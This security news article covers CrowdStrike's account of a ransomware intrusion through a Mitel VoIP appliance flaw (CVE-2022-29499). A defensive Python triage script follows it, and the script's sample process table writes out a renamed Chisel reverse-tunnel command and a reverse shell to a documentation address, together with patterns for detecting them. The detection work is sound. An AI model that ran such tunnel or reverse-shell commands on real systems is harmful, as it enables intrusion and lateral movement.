A suspected ransomware intrusion against an unnamed target used a Mitel VoIP appliance as an entry point to achieve remote code execution and gain initial access to the environment.
The findings come from cybersecurity firm CrowdStrike, which traced the source of the attack to a Linux-based Mitel VoIP appliance sitting on the network perimeter. The company also identified a previously unknown exploit, as well as a number of anti-forensic measures the actor took on the device to erase traces of their activity.
The exploit in question is tracked as CVE-2022-29499 and was patched by Mitel in April 2022. It carries a CVSS score of 9.8 out of 10, making it a critical flaw.
“A vulnerability has been identified in the Mitel Service Appliance component of MiVoice Connect (Mitel Service Appliances – SA 100, SA 400, and Virtual SA) that could allow a malicious actor to execute remote code (CVE-2022-29499) within the context of the Service Appliance,” the company noted in an advisory.
The exploit involved two HTTP GET requests (the request type used to retrieve a specific resource from a server) to trigger remote code execution by fetching rogue commands from attacker-controlled infrastructure.
In the incident investigated by CrowdStrike, the attacker is said to have used the exploit to create a reverse shell, then used that shell to drop a web shell (“pdf_import.php”) on the VoIP appliance and download the open source Chisel proxy tool.
The binary was then executed, but only after being renamed to “memdump” in an effort to fly under the radar, and the utility was used as a “reverse proxy to run the threat actor further into the environment via the VOIP device.” Subsequent detection of the activity halted the attacker's progress and prevented them from moving laterally across the network.
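The artefacts described above (an unexpected PHP file in the appliance's web root, a tunnelling tool running under an innocuous name, and an interactive shell holding a network socket) are the kind of thing a host triage script can check for. The following is an added example written for this page, not CrowdStrike's or Mitel's code, and it runs over a constructed process table and file listing rather than a live appliance. The web-root path, the "known good" PHP manifest, the addresses and the temp-directory list are assumptions; the Chisel argument pattern reflects the tool's documented client syntax (`client ... <server> R:<remote>` for a reverse tunnel), and matching on it is what catches a renamed copy that a simple name or port check would miss.

```python
"""Triage of the post-exploitation artefacts described in the article.

Added example, not code from CrowdStrike or Mitel. Every host record below
is constructed for the demonstration; paths and addresses are assumptions.
"""
import re

WEBROOT = "/var/www/html"  # assumed web root of the appliance

# Assumption: the vendor image's PHP files are known in advance (a manifest),
# so anything else under the web root is a web-shell candidate.
KNOWN_PHP = {
    "/var/www/html/index.php",
    "/var/www/html/login.php",
}

# Constructed file listing: the dropped web shell sits beside legitimate files.
FILES = [
    "/var/www/html/index.php",
    "/var/www/html/login.php",
    "/var/www/html/pdf_import.php",
]

# Constructed process table. 'remote' is the peer of any established socket
# the process holds (None if it has no network connection).
PROCESSES = [
    {"pid": 412, "comm": "asterisk",
     "cmdline": "/usr/sbin/asterisk -f", "remote": None},
    # Chisel renamed to "memdump": the name is bland, the port is 443, but the
    # arguments are still a reverse-tunnel request.
    {"pid": 7781, "comm": "memdump",
     "cmdline": "/tmp/memdump client --fingerprint x 203.0.113.7:443 R:socks",
     "remote": "203.0.113.7:443"},
    # The reverse shell: an interactive shell with a socket to the same host.
    {"pid": 7790, "comm": "sh", "cmdline": "sh -i", "remote": "203.0.113.7:4444"},
]

# Chisel client syntax: `client [flags] <server> <remote>...`; a remote
# prefixed with "R:" asks the server to open a reverse tunnel back to the client.
CHISEL_ARGS = re.compile(r"\bclient\b.*\bR:")

# World-writable locations a dropped binary is typically executed from (assumption).
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

INTERACTIVE_SHELLS = {"sh", "bash", "dash", "ash"}


def find_unknown_webroot_php(files, known=KNOWN_PHP, webroot=WEBROOT):
    """Return PHP files under the web root that are not in the vendor manifest."""
    return sorted(
        f for f in files
        if f.startswith(webroot) and f.endswith(".php") and f not in known
    )


def find_suspicious_processes(processes):
    """Return (pid, reason) pairs for processes matching the intrusion's patterns."""
    findings = []
    for p in processes:
        argv = p["cmdline"].split()
        exe = argv[0]
        if CHISEL_ARGS.search(p["cmdline"]):
            # Renaming the binary does not change its command line.
            findings.append((p["pid"],
                             f"chisel-style reverse tunnel arguments under name {p['comm']!r}"))
        elif p["remote"] and exe.startswith(TEMP_DIRS):
            findings.append((p["pid"], "network-connected binary executing from a temp dir"))
        if p["remote"] and p["comm"] in INTERACTIVE_SHELLS and "-i" in argv:
            findings.append((p["pid"], f"interactive shell with a socket to {p['remote']}"))
    return findings


def triage(processes=PROCESSES, files=FILES):
    """Run both checks and return the combined result as a dict."""
    return {
        "webshell_candidates": find_unknown_webroot_php(files),
        "process_findings": find_suspicious_processes(processes),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(key)
        for item in value:
            print("  ", item)
```

The point of the Chisel check is that neither the process name nor the destination port is trustworthy on a box the attacker controls: "memdump" talking to TCP/443 looks like routine telemetry until the argument list is read. On a real appliance the same data would come from `/proc/<pid>/cmdline` and the socket tables, and the PHP manifest would be built from a clean copy of the vendor image.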
The disclosure comes less than two weeks after German penetration testing company SySS revealed two flaws in Mitel 6800/6900 desk phones (CVE-2022-29854 and CVE-2022-29855) that, if successfully exploited, could allow an attacker to obtain root privileges on the devices.
“Timely patching is critical to protecting perimeter equipment. However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant,” said CrowdStrike researcher Patrick Bennett.
“Critical assets should be isolated from perimeter devices as much as possible. Ideally, if a threat actor compromises a perimeter device, it should not be possible to access critical assets via ‘one hop’ from the compromised device.”